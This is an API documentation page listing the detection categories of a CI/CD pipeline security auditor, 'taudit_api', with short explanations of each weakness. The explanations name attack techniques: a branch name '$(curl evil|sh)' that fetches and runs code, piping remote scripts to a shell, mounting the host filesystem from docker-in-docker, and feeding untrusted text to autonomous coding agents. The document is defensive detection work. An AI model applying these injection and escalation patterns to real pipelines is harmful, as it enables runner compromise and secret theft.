Skip to main content

FindingCategory

taudit_api

Enum FindingCategory 

Source 
pub enum FindingCategory {

Show 129 variants    AuthorityPropagation,
    OverPrivilegedIdentity,
    UnpinnedAction,
    UntrustedWithAuthority,
    ArtifactBoundaryCrossing,
    FloatingImage,
    LongLivedCredential,
    PersistedCredential,
    TriggerContextMismatch,
    CrossWorkflowAuthorityChain,
    AuthorityCycle,
    UpliftWithoutAttestation,
    SelfMutatingPipeline,
    CheckoutSelfPrExposure,
    VariableGroupInPrJob,
    SelfHostedPoolPrHijack,
    SharedSelfHostedPoolNoIsolation,
    ServiceConnectionScopeMismatch,
    TemplateExtendsUnpinnedBranch,
    TemplateRepoRefIsFeatureBranch,
    VmRemoteExecViaPipelineSecret,
    ShortLivedSasInCommandLine,
    SecretToInlineScriptEnvExport,
    SecretMaterialisedToWorkspaceFile,
    KeyVaultSecretToPlaintext,
    TerraformAutoApproveInProd,
    AddSpnWithInlineScript,
    ParameterInterpolationIntoShell,
    RuntimeScriptFetchedFromFloatingUrl,
    PrTriggerWithFloatingActionRef,
    UntrustedApiResponseToEnvSink,
    PrBuildPushesImageWithFloatingCredentials,
    SecretViaEnvGateToUntrustedConsumer,
    NoWorkflowLevelPermissionsBlock,
    ProdDeployJobNoEnvironmentGate,
    LongLivedSecretWithoutOidcRecommendation,
    PullRequestWorkflowInconsistentForkCheck,
    GitlabDeployJobMissingProtectedBranchOnly,
    TerraformOutputViaSetvariableShellExpansion,
    RiskyTriggerWithAuthority,
    SensitiveValueInJobOutput,
    ManualDispatchInputToUrlOrCommand,
    SecretsInheritOverscopedPassthrough,
    UnsafePrArtifactInWorkflowRunConsumer,
    ScriptInjectionViaUntrustedContext,
    InteractiveDebugActionInAuthorityWorkflow,
    PrSpecificCacheKeyInDefaultBranchConsumer,
    GhCliWithDefaultTokenEscalating,
    GhaScriptInjectionToPrivilegedShell,
    GhaWorkflowRunArtifactPoisoningToPrivilegedConsumer,
    GhaRemoteScriptInAuthorityJob,
    GhaPatRemoteUrlWrite,
    GhaIssueCommentCommandToWriteToken,
    GhaPrBuildPushesPublishableImage,
    GhaManualDispatchRefToPrivilegedCheckout,
    CiJobTokenToExternalApi,
    IdTokenAudienceOverscoped,
    UntrustedCiVarInShellInterpolation,
    UnpinnedIncludeRemoteOrBranchRef,
    DindServiceGrantsHostAuthority,
    SecurityJobSilentlySkipped,
    ChildPipelineTriggerInheritsAuthority,
    CacheKeyCrossesTrustBoundary,
    PatEmbeddedInGitRemoteUrl,
    CiTokenTriggersDownstreamWithVariablePassthrough,
    DotenvArtifactFlowsToPrivilegedDeployment,
    SetvariableIssecretFalse,
    HomoglyphInActionRef,
    GhaHelperPathSensitiveArgv,
    GhaHelperPathSensitiveStdin,
    GhaHelperPathSensitiveEnv,
    GhaPostAmbientEnvCleanupPath,
    GhaActionMintedSecretToHelper,
    GhaHelperUntrustedPathResolution,
    GhaSecretOutputAfterHelperLogin,
    LaterSecretMaterializedAfterPathMutation,
    GhaSetupNodeCacheHelperPathHandoff,
    GhaSetupPythonCacheHelperPathHandoff,
    GhaSetupPythonPipInstallAuthorityEnv,
    GhaSetupGoCacheHelperPathHandoff,
    GhaDockerSetupQemuPrivilegedDockerHelper,
    GhaToolInstallerThenShellHelperAuthority,
    GhaWorkflowShellAuthorityConcentration,
    GhaActionTokenEnvBeforeBareDownloadHelper,
    GhaPostActionInputRetargetToCacheSave,
    GhaTerraformWrapperSensitiveOutput,
    GhaCompositeBareHelperAfterPathInstallWithSecretEnv,
    GhaPulumiPathResolvedCliWithAuthority,
    GhaPypiPublishOidcAfterPathMutation,
    GhaChangesetsPublishCommandWithAuthority,
    GhaRubygemsReleaseGitTokenAndOidcHelper,
    GhaCompositeEntrypointPathShadowWithSecretEnv,
    GhaDockerBuildxAuthorityPathHandoff,
    GhaGoogleDeployGcloudCredentialPath,
    GhaDatadogTestVisibilityInstallerAuthority,
    GhaKubernetesHelperKubeconfigAuthority,
    GhaAzureCompanionHelperAuthority,
    GhaCreatePrGitTokenPathHandoff,
    GhaImportGpgPrivateKeyHelperPath,
    GhaSshAgentPrivateKeyToPathHelper,
    GhaMacosCodesignCertSecurityPath,
    GhaPagesDeployTokenUrlToGitHelper,
    GhaWorkflowRunArtifactMetadataToPrivilegedApi,
    GhaWorkflowRunArtifactReportToPrComment,
    GhaWorkflowRunArtifactToBuildScanPublish,
    GhaFloatingRemoteScriptBeforePublishSink,
    GhaTokenRemoteUrlWithTraceOrProcessExposure,
    GhaEnvCredentialHelperConfigRedirectBeforeAuthority,
    GhaEnvNodeOptionsCodeInjectionBeforeNodeAuthority,
    GhaEnvDyldOrLdLibraryPathBeforeCredentialHelper,
    GhaWorkflowCallContainerImageInputSecretsInherit,
    GhaWorkflowCallRunnerLabelInputPrivilegeEscalation,
    GhaContainerImageAttackerInfluencedWithSecretEnv,
    GhaAttestationSubjectDigestFromStepOutputUnverified,
    GhaAttestationSubjectPathWorkspaceGlobWithPrTrigger,
    GhaAttestationConfigDrivenGateFromWorkspaceFile,
    GhaTelemetryPrOrIssueTextToExternalSink,
    GhaTelemetryDebugFlagWithSecretEnv,
    GhaTelemetryAutonomousAgentInputFromUntrustedEvent,
    GhaWorkflowRunArtifactToBlobStorageToken,
    GhaApiWorkflowRunArtifactToAutonomousAgentToGitPush,
    GhaManifestNpmLifecycleHookPrTriggerWithToken,
    GhaManifestPythonMBuildWithPrCredentials,
    GhaManifestCargoBuildRsPullRequestWithToken,
    GhaManifestMakefileWithPrTriggerAndSecrets,
    GhaManifestSubmodulesRecursiveWithPrAuthority,
    GhaCrossrepoWorkflowCallFloatingRefCascade,
    GhaCrossrepoSecretsInheritUnreviewedCallee,
    GhaToolcacheAbsolutePathDowngrade,
    // some variants omitted

}
Expand description

MVP categories (1-5) are derivable from pipeline YAML alone. Stretch categories (6-9) need heuristics or metadata enrichment.

Variants§

§

AuthorityPropagation

§

OverPrivilegedIdentity

§

UnpinnedAction

§

UntrustedWithAuthority

§

ArtifactBoundaryCrossing

§

FloatingImage

§

LongLivedCredential

§

PersistedCredential

Credential written to disk by a step (e.g. persistCredentials: true on a checkout). Disk-persisted credentials are accessible to all subsequent steps and any process with filesystem access, unlike runtime-only HasAccessTo authority.

§

TriggerContextMismatch

Dangerous trigger type (pull_request_target / pr) combined with secret/identity access.

§

CrossWorkflowAuthorityChain

Authority (secret/identity) flows into an opaque external workflow via DelegatesTo.

§

AuthorityCycle

Circular DelegatesTo chain — workflow calls itself transitively.

§

UpliftWithoutAttestation

Privileged workflow (OIDC/broad identity) with no provenance attestation step.

§

SelfMutatingPipeline

Step writes to the environment gate ($GITHUB_ENV, pipeline variables) — authority can propagate.

§

CheckoutSelfPrExposure

PR-triggered pipeline checks out the repository — attacker-controlled fork code lands on the runner.

§

VariableGroupInPrJob

ADO variable group consumed by a PR-triggered job, crossing trust boundary.

§

SelfHostedPoolPrHijack

Self-hosted agent pool used in a PR-triggered job that also checks out the repository.

§

SharedSelfHostedPoolNoIsolation

ADO self-hosted pool without workspace isolation (clean: true/all). Shared self-hosted agents retain their workspace across pipeline runs. Without workspace: { clean: all }, a PR build can deposit malicious files that persist for the next (possibly privileged) pipeline run, enabling workspace poisoning attacks.

§

ServiceConnectionScopeMismatch

Broad-scope ADO service connection reachable from a PR-triggered job without OIDC.

§

TemplateExtendsUnpinnedBranch

ADO resources.repositories[] entry referenced by an extends:, template: x@alias, or checkout: alias consumer resolves with no ref: (default branch) or a mutable branch ref (refs/heads/<name>). Whoever owns that branch can inject steps into the consuming pipeline.

§

TemplateRepoRefIsFeatureBranch

ADO resources.repositories[] entry pinned to a feature-class branch (anything outside the main / master / release/* / hotfix/* platform set). Feature branches typically have weaker push protection than the trunk, so any developer with write access to that branch can inject pipeline YAML that runs with the consumer’s authority. Strictly stronger signal than template_extends_unpinned_branch — co-fires.

§

VmRemoteExecViaPipelineSecret

Pipeline step uses an Azure VM remote-exec primitive (Set-AzVMExtension / CustomScriptExtension, Invoke-AzVMRunCommand, az vm run-command, az vm extension set) where the executed command line interpolates a pipeline secret or a SAS token — pipeline-to-VM lateral movement primitive logged in plaintext to the VM and ARM.

§

ShortLivedSasInCommandLine

A SAS token freshly minted in-pipeline is interpolated into a CLI argument (commandToExecute / scriptArguments / –arguments / -ArgumentList) instead of passed via env var or stdin — argv ends up in /proc/*/cmdline, ETW, ARM status.

§

SecretToInlineScriptEnvExport

Pipeline secret value assigned to a shell variable inside an inline script (export VAR=$(SECRET), $X = "$(SECRET)"). Once the value transits a shell variable, ADO’s $(SECRET) log mask no longer applies — transcripts (Start-Transcript, bash -x, terraform debug logs) print the cleartext.

§

SecretMaterialisedToWorkspaceFile

Pipeline secret value written to a file under the agent workspace ($(System.DefaultWorkingDirectory), $(Build.SourcesDirectory), or relative paths) without secureFile task or chmod 600. The file persists in the agent workspace and is uploaded by PublishPipelineArtifact and crawlable by later steps.

§

KeyVaultSecretToPlaintext

PowerShell pulls a Key Vault secret with -AsPlainText (or ConvertFrom-SecureString -AsPlainText, or older .SecretValueText syntax) into a non-SecureString variable. The value never traverses the ADO variable-group boundary, so verbose Az/PS logging and error stack traces print the credential.

Rule id is keyvault_secret_to_plaintext (single token “keyvault”) rather than the snake_case derivation key_vault_… — matches the docs filename and the convention used in the corpus evidence.

§

TerraformAutoApproveInProd

terraform apply -auto-approve against a production-named service connection without an environment approval gate.

§

AddSpnWithInlineScript

AzureCLI@2 task with addSpnToEnvironment: true AND an inline script — the script can launder federated SPN/OIDC tokens into pipeline variables.

§

ParameterInterpolationIntoShell

A type: string pipeline parameter (no values: allowlist) is interpolated via ${{ parameters.X }} into an inline shell/PowerShell script body — shell injection vector for anyone with “queue build”.

§

RuntimeScriptFetchedFromFloatingUrl

A run: block fetches a remote script from a mutable URL (refs/heads/, /main/, /master/) and pipes it directly to a shell interpreter (curl … | bash, wget … | sh, bash <(curl …), deno run https://…). Whoever controls that URL’s content controls execution on the runner.

§

PrTriggerWithFloatingActionRef

Workflow trigger combines high-authority PR events (pull_request_target, issue_comment, or workflow_run) with a step whose uses: ref is a mutable branch/tag (not a 40-char SHA). Compromise of the action’s default branch yields full repo write on the target repo.

§

UntrustedApiResponseToEnvSink

A workflow_run-triggered workflow captures a value from an external API response (gh pr view, gh api, curl api.github.com) and writes it into $GITHUB_ENV/$GITHUB_OUTPUT/$GITHUB_PATH without sanitisation. A poisoned API field (branch name, title) injects environment variables into every subsequent step in the same job.

§

PrBuildPushesImageWithFloatingCredentials

A pull_request-triggered workflow logs into a container registry via a floating (non-SHA-pinned) login action. The compromised action receives OIDC tokens or registry credentials, and the workflow then pushes a PR-controlled image to a shared registry.

§

SecretViaEnvGateToUntrustedConsumer

First-party step writes a Secret/Identity-derived value into the $GITHUB_ENV gate (or pipeline-variable equivalent) and a later step in the same job that runs in Untrusted or ThirdParty trust zone reads from the runner-managed env (${{ env.X }}). The two component rules — self_mutating_pipeline (writer) and untrusted_with_authority (consumer) — each see only half the chain and emit no finding for the laundered consumer; this rule closes the composition gap that R2 attack #3 exploited.

§

NoWorkflowLevelPermissionsBlock

Positive-invariant rule (GHA): the workflow declares neither a top-level nor a per-job permissions: block, leaving GITHUB_TOKEN at its broad platform default. Fires once per workflow file.

§

ProdDeployJobNoEnvironmentGate

Positive-invariant rule (ADO): a job referencing a production-named service connection has no environment: binding, so it bypasses the only ADO-side approval gate regardless of whether -auto-approve is present. Strictly broader than terraform_auto_approve_in_prod.

§

LongLivedSecretWithoutOidcRecommendation

Positive-invariant rule (cross-platform): a long-lived static credential is in scope but the workflow does not currently use any OIDC identity even though the target cloud supports federation. Advisory uplift on top of long_lived_credential that wires the existing Recommendation::FederateIdentity variant.

§

PullRequestWorkflowInconsistentForkCheck

Positive-invariant rule (GHA): a PR-triggered workflow has multiple privileged jobs where SOME have the standard fork-check if: and OTHERS do not. Detects an intra-file inconsistency in defensive posture — the org has the right instinct but applied it unevenly.

§

GitlabDeployJobMissingProtectedBranchOnly

Positive-invariant rule (GitLab): a job with a production-named environment: binding has no rules: / only: clause restricting it to protected branches. Deploy job runs (or attempts to run) on every pipeline trigger.

§

TerraformOutputViaSetvariableShellExpansion

Two-step ADO chain: an inline script captures a terraform output value (literal terraform output CLI invocation or a $env:TF_OUT_* / $TF_OUT_* env var sourced from a Terraform CLI task) AND emits a ##vso[task.setvariable variable=X;...] directive setting that captured value into pipeline variable X. A subsequent step in the same job then expands $(X) in shell-expansion position (bash -c "...", eval, command substitution $(...), PowerShell -split / Invoke-Command / Invoke-Expression/iex, or as an unquoted command word). The task.setvariable hop launders attacker-controlled Terraform state — sourced from a remote backend (S3 bucket, Azure Storage) that often has weaker access controls than the pipeline itself — through pipeline-variable space and into a shell interpreter.

§

RiskyTriggerWithAuthority

GHA workflow declares a high-blast-radius trigger (issue_comment, pull_request_review, pull_request_review_comment, workflow_run) alongside write permissions or non-GITHUB_TOKEN secrets. Closes the gap left by trigger_context_mismatch only firing on pull_request_target / ADO pr.

§

SensitiveValueInJobOutput

A jobs.<id>.outputs.<name> value is sourced from secrets.*, an OIDC-bearing step output, or has a credential-shaped name. Job outputs flow unmasked through needs.<job>.outputs.* and are written to the run log — masking is heuristic, never authoritative.

§

ManualDispatchInputToUrlOrCommand

A workflow_dispatch.inputs.* value flows into curl / wget / gh api / a run: URL / actions/checkout ref:. Anyone with dispatch permission can pivot the run to attacker-controlled refs or hosts.

§

SecretsInheritOverscopedPassthrough

A reusable workflow call uses secrets: inherit while the caller is triggered by an attacker-influenced event (pull_request, pull_request_target, issue_comment, workflow_run). The whole caller secret bag forwards to the callee regardless of what the callee actually consumes — every transitive uses: in the called workflow inherits the same scope.

§

UnsafePrArtifactInWorkflowRunConsumer

A workflow_run- or pull_request_target-triggered consumer downloads an artifact from the originating run AND interprets that artifact’s content into a privileged sink (post-to-comment, write to $GITHUB_ENV, eval, …). The producer ran in PR context, so a malicious PR can write arbitrary content into the artifact while the consumer holds upstream-repo authority.

§

ScriptInjectionViaUntrustedContext

A GitHub Actions run: block (or actions/github-script script: body) interpolates an attacker-controllable expression — ${{ github.event.* }}, ${{ github.head_ref }}, or ${{ inputs.* }} from a privileged trigger (workflow_dispatch / workflow_run / issue_comment) — directly into the script text without first binding through an env: indirection. Classic GitHub Actions remote-code-execution pattern.

§

InteractiveDebugActionInAuthorityWorkflow

A workflow that holds non-GITHUB_TOKEN secrets or non-default write permissions includes a step that uses an interactive debug action (mxschmitt/action-tmate, lhotari/action-upterm, actions/tmate, …). A maintainer flipping debug_enabled=true publishes the runner’s full environment over an external SSH endpoint.

§

PrSpecificCacheKeyInDefaultBranchConsumer

An actions/cache step keys the cache on a PR-derived expression (github.head_ref, github.event.pull_request.head.ref, github.actor) in a workflow that ALSO runs on push: branches: [main] — a PR can poison the cache that the default-branch build later restores.

§

GhCliWithDefaultTokenEscalating

A run: step uses gh / gh api with the default GITHUB_TOKEN to perform a write-class action (pr merge, release create/upload, api -X POST/PATCH/PUT/DELETE to /repos/.../{contents,releases,actions/secrets,environments}) inside a workflow triggered by pull_request, issue_comment, or workflow_run — runtime privilege escalation that static permission checks miss.

§

GhaScriptInjectionToPrivilegedShell

Attacker-controlled GitHub context is interpolated directly into a privileged shell/script step that holds secrets, OIDC, or write token.

§

GhaWorkflowRunArtifactPoisoningToPrivilegedConsumer

Workflow-run or pull-request-target consumer downloads a PR artifact, interprets it, and holds write-token or non-default authority.

§

GhaRemoteScriptInAuthorityJob

Mutable remote script execution happens inside a job with secrets, OIDC, cloud, registry, package, signing, or write-token authority.

§

GhaPatRemoteUrlWrite

A GitHub Actions shell step embeds a PAT/token in a git remote URL and performs a write-capable git operation.

§

GhaIssueCommentCommandToWriteToken

An issue-comment workflow turns comment body or issue metadata into a command path while write-token authority is present.

§

GhaPrBuildPushesPublishableImage

PR-triggered workflow builds and pushes a container image while registry or cloud publish authority is present.

§

GhaManualDispatchRefToPrivilegedCheckout

workflow_dispatch input selects the checkout ref in a workflow with write-token, secret, or deploy authority.

§

CiJobTokenToExternalApi

GitLab CI $CI_JOB_TOKEN (or gitlab-ci-token:$CI_JOB_TOKEN) used as a bearer credential against an external HTTP API or fed to docker login for registry.gitlab.com. CI_JOB_TOKEN’s default scope (registry write, package upload, project read) means a poisoned MR job that emits the token to a webhook can pivot to package/registry pushes elsewhere.

§

IdTokenAudienceOverscoped

GitLab CI id_tokens: declares an aud: audience that is reused across MR-context and protected-context jobs (no audience separation), or is a wildcard / multi-cloud broker URL. The audience is what trades for downstream cloud creds — a single shared aud means any job that compromises the token assumes the most-privileged role any other job uses.

§

UntrustedCiVarInShellInterpolation

Direct shell interpolation of attacker-controlled GitLab predefined vars ($CI_COMMIT_BRANCH, $CI_COMMIT_REF_NAME, $CI_COMMIT_TAG, $CI_COMMIT_MESSAGE, $CI_COMMIT_TITLE, $CI_MERGE_REQUEST_TITLE, $CI_MERGE_REQUEST_DESCRIPTION, $CI_MERGE_REQUEST_SOURCE_BRANCH_NAME, $CI_COMMIT_AUTHOR) into script: / before_script: / after_script: / environment:url: without single-quote isolation. A branch named $(curl evil|sh) executes inside the runner. GitLab generalisation of the GHA script_injection_via_untrusted_context class.

§

UnpinnedIncludeRemoteOrBranchRef

A GitLab include: references (a) a remote: URL pointing at a branch (/-/raw/<branch>/...), (b) a project: with ref: resolving to a mutable branch name (main/master/develop), or (c) an include with no ref: at all (defaults to HEAD). Whoever owns that branch can backdoor every consumer’s pipeline silently — included YAML executes with the consumer’s secrets and CI_JOB_TOKEN.

§

DindServiceGrantsHostAuthority

A GitLab job declares a services: [docker:*-dind] sidecar AND holds at least one non-CI_JOB_TOKEN secret (registry creds, deploy keys, signing keys, vault id_tokens). docker-in-docker exposes the full Docker socket inside the job container — a malicious build step can docker run -v /:/host from inside dind and read the runner host filesystem (other jobs’ artifacts, cached creds).

§

SecurityJobSilentlySkipped

A GitLab job whose name or extends: matches scanner patterns (sast, dast, secret_detection, dependency_scanning, container_scanning, gitleaks, trivy, grype, semgrep, etc.) runs with allow_failure: true AND has no rules: clause that surfaces the failure. The pipeline goes green even when the scan errors out — silent-pass is worse than no scan because reviewers trust the badge.

§

ChildPipelineTriggerInheritsAuthority

A GitLab trigger: job (downstream / child pipeline) runs in merge_request_event context OR uses include: artifact: from a previous job (dynamic child pipeline). Dynamic child pipelines are a code-injection sink — anything the build step writes to the artifact runs as a real pipeline with the parent project’s secrets.

§

CacheKeyCrossesTrustBoundary

A GitLab cache: declaration whose key: is hardcoded, $CI_JOB_NAME only, or $CI_COMMIT_REF_SLUG without a policy: pull restriction. Caches are stored per-runner keyed by key:; a poisoned MR can push a malicious node_modules/ cache that the next default-branch job downloads and executes during npm install.

§

PatEmbeddedInGitRemoteUrl

A CI script constructs an HTTPS git URL with embedded credentials (https://user:$TOKEN@host/...) before invoking git clone, git push, or git remote set-url. The credential is exposed in the process argv (visible to ps, /proc/*/cmdline), persists in .git/config for the rest of the job, and may be uploaded as part of any artifact that bundles the workspace.

§

CiTokenTriggersDownstreamWithVariablePassthrough

A CI job triggers a different project’s pipeline via the GitLab REST API using CI_JOB_TOKEN and forwards user-influenced variables through the variables[KEY]=value query/form parameter. The downstream project’s security depends on the trust contract between the two projects — variable values flowing across that boundary constitute a cross-project authority bridge.

§

DotenvArtifactFlowsToPrivilegedDeployment

A GitLab job emits an artifacts.reports.dotenv: <file> artifact whose contents become pipeline variables for any consumer linked via needs: or dependencies:. A consumer in a later stage that targets a production-named environment inherits those variables transparently — no explicit download is visible at the job level. When the producer reads attacker-influenced inputs (branch names, commit messages), the dotenv flow is a covert privilege escalation channel into the deployment job.

§

SetvariableIssecretFalse

ADO inline script sets a sensitive-named pipeline variable via ##vso[task.setvariable variable=<NAME>] with issecret=false or without the issecret flag at all. Without issecret=true the variable value is printed in plaintext to the pipeline log and is not masked in downstream step output.

§

HomoglyphInActionRef

A GHA uses: action reference contains a non-ASCII character — possible Unicode confusable / homoglyph impersonating a trusted action (e.g. Cyrillic a instead of Latin a, or U+2215 DIVISION SLASH instead of U+002F SOLIDUS).

§

GhaHelperPathSensitiveArgv

A GitHub Actions step mutates GITHUB_PATH before a later known helper-delegating action passes sensitive material to a bare helper via command-line arguments. The prior step can select the helper that receives later action-only authority.

§

GhaHelperPathSensitiveStdin

A GitHub Actions step mutates GITHUB_PATH before a later known helper-delegating action passes sensitive material to a bare helper over stdin, such as Docker login passwords or Wrangler secret payloads.

§

GhaHelperPathSensitiveEnv

A GitHub Actions step mutates GITHUB_PATH before a later known helper-delegating action runs a bare helper with sensitive environment values in scope.

§

GhaPostAmbientEnvCleanupPath

A GitHub Actions post action recomputes cleanup targets from ambient environment rather than an action-owned state channel, allowing later GITHUB_ENV writes to retarget cleanup.

§

GhaActionMintedSecretToHelper

A GitHub Actions action mints or exchanges later credentials and then delegates them to a PATH-resolved helper.

§

GhaHelperUntrustedPathResolution

A GitHub Actions action invokes a security-sensitive helper by bare name after an earlier same-job GITHUB_PATH mutation.

§

GhaSecretOutputAfterHelperLogin

A GitHub Actions login action exposes credential material as step outputs after helper login, making cross-job propagation easy to miss.

§

LaterSecretMaterializedAfterPathMutation

Umbrella GHA authority-confusion classifier: an earlier same-job GITHUB_PATH mutation precedes a later helper action that receives or mints sensitive authority.

§

GhaSetupNodeCacheHelperPathHandoff

actions/setup-node cache mode resolves npm/pnpm/yarn helpers after an earlier same-job GITHUB_PATH mutation.

§

GhaSetupPythonCacheHelperPathHandoff

actions/setup-python cache mode resolves pip/pipenv/poetry helpers after an earlier same-job GITHUB_PATH mutation.

§

GhaSetupPythonPipInstallAuthorityEnv

actions/setup-python pip-install mode runs pip while inheriting ambient credentials or cloud authority.

§

GhaSetupGoCacheHelperPathHandoff

actions/setup-go cache mode resolves Go helpers after an earlier same-job GITHUB_PATH mutation.

§

GhaDockerSetupQemuPrivilegedDockerHelper

docker/setup-qemu-action invokes Docker/QEMU helper flow in a job that already has registry authority or private-image context.

§

GhaToolInstallerThenShellHelperAuthority

Tool-installer action is followed by shell use of the installed helper while deploy/signing authority is in scope.

§

GhaWorkflowShellAuthorityConcentration

Shell command sequence concentrates publish, deploy, signing, registry, or release authority in a workflow step.

§

GhaActionTokenEnvBeforeBareDownloadHelper

A token-bearing action boundary invokes bare download or verification helpers after an earlier same-job GITHUB_PATH mutation.

§

GhaPostActionInputRetargetToCacheSave

A post action can retarget cache-save cleanup from ambient action input or environment state after a later same-job mutation.

§

GhaTerraformWrapperSensitiveOutput

hashicorp/setup-terraform wrapper outputs are consumed by a later step, potentially moving sensitive Terraform stdout/stderr material.

§

GhaCompositeBareHelperAfterPathInstallWithSecretEnv

A workflow or composite-style shell step invokes a bare helper after mutable PATH setup while secret environment authority is in scope.

§

GhaPulumiPathResolvedCliWithAuthority

Pulumi action/CLI authority is delegated to a PATH-resolved pulumi helper after an earlier same-job GITHUB_PATH mutation.

§

GhaPypiPublishOidcAfterPathMutation

PyPI publish authority or OIDC publishing capability reaches PyPI helper resolution after an earlier same-job GITHUB_PATH mutation.

§

GhaChangesetsPublishCommandWithAuthority

Changesets publish authority reaches package-manager helper resolution after an earlier same-job GITHUB_PATH mutation.

§

GhaRubygemsReleaseGitTokenAndOidcHelper

RubyGems release token or OIDC authority reaches gem/bundle/git helper resolution after an earlier same-job GITHUB_PATH mutation.

§

GhaCompositeEntrypointPathShadowWithSecretEnv

A local/composite action entrypoint can be path-shadowed before it runs with secret environment authority.

§

GhaDockerBuildxAuthorityPathHandoff

Docker Buildx setup/build-push authority reaches Docker/buildx helpers after an earlier same-job GITHUB_PATH mutation.

§

GhaGoogleDeployGcloudCredentialPath

Google deploy actions receive generated Google/cloud authority before delegating to gcloud after mutable PATH setup.

§

GhaDatadogTestVisibilityInstallerAuthority

Datadog test visibility setup runs installer/helper flow with API key authority after mutable PATH setup.

§

GhaKubernetesHelperKubeconfigAuthority

Kubernetes or Helm helper commands run with kubeconfig/deploy authority after mutable PATH setup.

§

GhaAzureCompanionHelperAuthority

Azure companion helpers such as sqlcmd, SqlPackage, kubelogin, or pwsh run with Azure login authority after mutable PATH setup.

§

GhaCreatePrGitTokenPathHandoff

peter-evans/create-pull-request receives PR token authority after an earlier same-job GITHUB_PATH mutation and delegates to git.

§

GhaImportGpgPrivateKeyHelperPath

crazy-max/ghaction-import-gpg receives GPG private key/passphrase material after an earlier same-job GITHUB_PATH mutation.

§

GhaSshAgentPrivateKeyToPathHelper

webfactory/ssh-agent receives SSH private key material after an earlier same-job GITHUB_PATH mutation.

§

GhaMacosCodesignCertSecurityPath

apple-actions/import-codesign-certs receives macOS P12/keychain material after an earlier same-job GITHUB_PATH mutation.

§

GhaPagesDeployTokenUrlToGitHelper

Pages deploy actions compose token/deploy-key Git authority after an earlier same-job GITHUB_PATH mutation.

§

GhaWorkflowRunArtifactMetadataToPrivilegedApi

A workflow_run / pull_request_target consumer downloads a PR-context artifact, then uses artifact-derived PR metadata near a write-class GitHub API/comment sink.

§

GhaWorkflowRunArtifactReportToPrComment

A workflow_run / pull_request_target consumer downloads a PR-context artifact, reads report content, and posts it to a PR or review comment sink.

§

GhaWorkflowRunArtifactToBuildScanPublish

A workflow_run / pull_request_target consumer downloads a PR-context artifact and feeds artifact-derived data into a build-scan or Develocity publication path.

§

GhaFloatingRemoteScriptBeforePublishSink

A mutable remote script is executed before a publish/deploy/release sink in the same authority-bearing GitHub Actions job.

§

GhaTokenRemoteUrlWithTraceOrProcessExposure

A token-bearing Git remote URL is used while trace/debug/process exposure is enabled, making the token observable through argv, logs, or process inspection.

§

GhaEnvCredentialHelperConfigRedirectBeforeAuthority

Earlier same-job env state redirects a credential helper’s config file before later cloud, registry, package, or signing authority is present.

§

GhaEnvNodeOptionsCodeInjectionBeforeNodeAuthority

Earlier same-job NODE_OPTIONS startup injection reaches a later Node/npm/npx/yarn authority boundary.

§

GhaEnvDyldOrLdLibraryPathBeforeCredentialHelper

Earlier same-job dynamic-loader env state reaches a later credential-bearing helper boundary.

§

GhaWorkflowCallContainerImageInputSecretsInherit

A reusable workflow accepts caller-controlled container image input while secrets are inherited across the caller/callee boundary.

§

GhaWorkflowCallRunnerLabelInputPrivilegeEscalation

A reusable workflow accepts caller-controlled runner labels while secrets, OIDC, or write-token authority is available.

§

GhaContainerImageAttackerInfluencedWithSecretEnv

A job runs in an attacker-influenced container image while secret or token authority is present in that job.

§

GhaAttestationSubjectDigestFromStepOutputUnverified

Attestation action signs a caller/step-provided subject digest rather than a digest it independently computed from a workspace file.

§

GhaAttestationSubjectPathWorkspaceGlobWithPrTrigger

PR-reachable workflow signs files selected by a workspace glob.

§

GhaAttestationConfigDrivenGateFromWorkspaceFile

Attestation reachability is gated by a workspace/config-derived output.

§

GhaTelemetryPrOrIssueTextToExternalSink

PR, issue, or comment text is sent to an external telemetry sink.

§

GhaTelemetryDebugFlagWithSecretEnv

Debug logging is enabled while secret-bearing environment is present.

§

GhaTelemetryAutonomousAgentInputFromUntrustedEvent

Autonomous coding agent receives untrusted event text while mutation authority is available.

§

GhaWorkflowRunArtifactToBlobStorageToken

Workflow-run artifact bytes are published to blob/object storage under token authority.

§

GhaApiWorkflowRunArtifactToAutonomousAgentToGitPush

Workflow-run artifact or failure data reaches an autonomous agent before a GitHub or git mutation step.

§

GhaManifestNpmLifecycleHookPrTriggerWithToken

PR-reachable npm-family install runs manifest lifecycle hooks while token, secret, OIDC, registry, cloud, or write authority is present.

§

GhaManifestPythonMBuildWithPrCredentials

PR-reachable Python build/install path executes project manifest code while publish credentials or OIDC authority are present.

§

GhaManifestCargoBuildRsPullRequestWithToken

PR-reachable Cargo compile path can run build.rs/proc-macro code while token, secret, OIDC, registry, cloud, or write authority is present.

§

GhaManifestMakefileWithPrTriggerAndSecrets

PR/workflow_run/issue_comment-reachable Makefile execution occurs while secret, token, OIDC, registry, cloud, or write authority is present.

§

GhaManifestSubmodulesRecursiveWithPrAuthority

Recursive checkout submodules are enabled in a PR-reachable authority job, letting PR-mutable .gitmodules influence workspace code.

§

GhaCrossrepoWorkflowCallFloatingRefCascade

A cross-repo reusable workflow call uses a mutable branch/tag ref.

§

GhaCrossrepoSecretsInheritUnreviewedCallee

A cross-repo reusable workflow call forwards the caller’s full secret surface with secrets: inherit.

§

GhaToolcacheAbsolutePathDowngrade

Precision guard for actions that install a helper into the toolcache and invoke that absolute path instead of resolving a bare helper from runner PATH.

Trait Implementations§

Source§

impl Clone for FindingCategory

Source§

fn clone(&self) -> FindingCategory

Returns a duplicate of the value. Read more
1.0.0 (const: unstable) · Source§

fn clone_from(&mut self, source: &Self)

Performs copy-assignment from source. Read more
Source§

impl Debug for FindingCategory

Source§

fn fmt(&self, f: &mut Formatter<'_>) -> Result

Formats the value using the given formatter. Read more
Source§

impl<'de> Deserialize<'de> for FindingCategory

Source§

fn deserialize<__D>(__deserializer: __D) -> Result<Self, __D::Error>
where __D: Deserializer<'de>,

Deserialize this value from the given Serde deserializer. Read more
Source§

impl Hash for FindingCategory

Source§

fn hash<__H: Hasher>(&self, state: &mut __H)

Feeds this value into the given Hasher. Read more
1.3.0 · Source§

fn hash_slice<H>(data: &[Self], state: &mut H)
where H: Hasher, Self: Sized,

Feeds a slice of this type into the given Hasher. Read more
Source§

impl PartialEq for FindingCategory

Source§

fn eq(&self, other: &FindingCategory) -> bool

Tests for self and other values to be equal, and is used by ==.
1.0.0 (const: unstable) · Source§

fn ne(&self, other: &Rhs) -> bool

Tests for !=. The default implementation is almost always sufficient, and should not be overridden without very good reason.
Source§

impl Serialize for FindingCategory

Source§

fn serialize<__S>(&self, __serializer: __S) -> Result<__S::Ok, __S::Error>
where __S: Serializer,

Serialize this value into the given Serde serializer. Read more
Source§

impl Copy for FindingCategory

Source§

impl Eq for FindingCategory

Source§

impl StructuralPartialEq for FindingCategory
